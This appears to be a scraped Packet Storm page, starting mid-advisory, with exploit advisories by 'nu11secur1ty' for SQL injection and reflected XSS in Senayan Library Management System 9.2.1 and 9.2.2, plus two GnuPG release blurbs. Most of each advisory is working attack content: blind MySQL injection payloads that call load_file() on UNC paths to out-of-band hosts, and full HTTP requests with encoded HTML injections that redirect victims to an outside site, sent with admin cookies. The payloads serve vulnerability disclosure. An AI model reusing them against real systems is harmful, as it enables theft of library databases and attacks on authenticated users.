0x62626262+(selectload_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''+(selectload_file(0x5c5c5c5c3172746239777132393937646638783478326364746d70346b76716f656532353574776a6a6237302e736c696d732e7765622e69645c5c617667))+''ELSE 0x28 END)) AND 'xMPZ'='xMPZ&membershipType=a''&collType=aaaa'+(selectload_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(selectload_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'---01---Parameter: collType (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY orGROUP BY clause    Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(selectload_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'&membershipType=a''&collType=aaaa'+(selectload_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(selectload_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+''RLIKE (SELECT (CASE WHEN (2279=2279) THEN 0x61616161+(selectload_file(0x5c5c5c5c646374697930687a69777a643478756a6671716366643375756c306b6f61633166703666743968792e736c696d732e7765622e69645c5c777466))+''+(selectload_file(0x5c5c5c5c617a6469746d3536316837666b7533796a39397573386e653235387a77706b676e346575316f70642e736c696d732e7765622e69645c5c647a64))+''ELSE 0x28 END)) AND 'MGZY'='MGZY---03---Parameter: membershipType (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY orGROUP BY clause    Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(selectload_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'&membershipType=a'''RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x612727 ELSE 0x28 END)) AND'ckmk'='ckmk&collType=aaaa'+(select load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(selectload_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi)## Reference:[Using HTTP cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies)## Proof and Exploit:[href](https://streamable.com/1m0y6c)## Time spent`00:35:00`## Writing an exploit`00:15:00`

Senayan Library Management System 9.2.2 SQL Injection

Senayan Library Management System version 9.2.2 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.2.2 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.21.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit a verydangerous web page or malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET /slims9_bulian-9.2.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=ijs22qmki227r86feh6bppc56o; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2)## Proof and Exploit:[href](https://streamable.com/mnpw30)## Time spent`00:05:00`

Senayan Library Management System 9.2.2 Cross Site Scripting

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions.

GNU Privacy Guard 2.4.0

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions. This is the LTS release.

GNU Privacy Guard 2.2.41

Senayan Library Management System version 9.2.1 suffers from a remote SQL injection vulnerability.

    ## Title: Senayan Library Management System v9.2.1 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 12.20.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.1## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1/SQLi## Description:The manual insertion `point 4` appears to be vulnerable to SQLinjection attacks. The payload '+(selectload_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+'was submitted in the manual insertion `point 4`.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can take information from all database columns of thissystem by using this vulnerability.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQL---Parameter: class (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: reportView=true&year=2002&class=bbbb'+(selectload_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''RLIKE (SELECT (CASE WHEN (5179=5179) THEN 0x62626262+(selectload_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''ELSE 0x28 END)) AND 'BcGE'='BcGE&membershipType=a'''+(selectload_file('\\\\c0dsife82nybqm59yrpe81r86zct0kobrzip5it7.oastify.com\\bjr'))+'&collType=aaaa'+(selectload_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(selectload_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1/SQLi)## Proof and Exploit:[href](https://streamable.com/zp75bx)## Time spent`00:15:00`## Writing an exploit`00:05:00`

Senayan Library Management System 9.2.1 SQL Injection

Senayan Library Management System version 9.2.1 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.2.1 a.k.a SLIMS 9XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.20.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.2.1/slims9_bulian-9.2.1.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit anvery dangerous web page ot malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET /slims9_bulian-9.2.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%22%3e%0a%0a&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=o6o88hktpej7qdtu621h58q16q; admin_logged_in=1Connection: closeContent-Length: 2```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1)## Proof and Exploit:[href](https://streamable.com/i20ipf)## Time spent`01:35:00`

Source

Packet Storm